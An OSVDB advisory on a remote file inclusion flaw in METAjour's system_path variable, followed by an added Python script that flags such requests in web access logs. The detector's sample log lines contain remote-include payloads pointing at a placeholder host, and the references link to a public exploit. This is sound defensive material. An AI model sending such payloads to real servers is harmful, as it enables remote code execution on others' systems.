METAjour erek_comp_view_listdone.php system_path Variable Remote File Inclusion

2006-05-31T00:00:00
ID OSVDB:39445
Type osvdb
Reporter OSVDB
Modified 2006-05-31T00:00:00

Description

Vulnerability Description

METAjour contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'erek_comp_view_listdone.php' not properly sanitizing user input supplied to the 'system_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).
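Added example, not part of the OSVDB entry or METAjour's own code: a web access log check for the condition described above. It flags requests to erek_comp_view_listdone.php that set system_path in the query string and marks those whose value begins with a URL scheme. The log lines, the /app/ directory, and the host names are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

SCRIPT = "erek_comp_view_listdone.php"  # script named in the advisory
PARAM = "system_path"                   # variable named in the advisory

# Combined-log-format entry: client IP, request target, status code.
REQ_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')
# Value that begins with a URL scheme (http://, ftp://, ...), i.e. not a local path.
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)

# Constructed sample lines; the /app/ directory and hosts are placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [31/May/2006:10:00:00 +0000] "GET /app/erek_comp_view_listdone.php?id=4 HTTP/1.1" 200 5120
198.51.100.7 - - [31/May/2006:10:01:12 +0000] "GET /app/erek_comp_view_listdone.php?system_path=http://files.example.invalid/x.txt? HTTP/1.0" 200 311
198.51.100.7 - - [31/May/2006:10:01:15 +0000] "GET /app/erek_comp_view_listdone.php?system_path=HTTP%3A%2F%2Ffiles.example.invalid%2Fx HTTP/1.0" 200 311
203.0.113.5 - - [31/May/2006:10:02:40 +0000] "GET /app/erek_comp_view_listdone.php?system_path=../lib/ HTTP/1.1" 200 98
192.0.2.10 - - [31/May/2006:10:03:00 +0000] "GET /app/index.php?system_path=http://files.example.invalid/x HTTP/1.1" 404 210
"""

def classify(line):
    """Return a finding dict for a request that sets PARAM on SCRIPT, else None."""
    m = REQ_RE.match(line)
    if not m:
        return None
    ip, target, status = m.groups()
    parts = urlsplit(target)
    if unquote(parts.path).rsplit("/", 1)[-1] != SCRIPT:
        return None
    # parse_qs percent-decodes names and values, so encoded forms are caught too.
    values = parse_qs(parts.query, keep_blank_values=True).get(PARAM)
    if values is None:
        return None
    remote = any(SCHEME_RE.match(v.strip()) for v in values)
    return {"ip": ip, "status": int(status),
            "verdict": "remote-include" if remote else "param-set"}

def scan(log_text):
    """Classify every line. Access logs show only the query string, while
    register_globals also accepts the variable from POST data or cookies."""
    return [f for f in map(classify, log_text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A "param-set" hit is still worth review: the variable is internal to the application, so any client-supplied value for it is unexpected.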

References:

Vendor URL: http://www.metajour.org/
Secunia Advisory ID: 20404
Generic Exploit URL: http://milw0rm.com/exploits/1855
FrSIRT Advisory: ADV-2006-2077
CVE-2006-2768
Bugtraq ID: 18211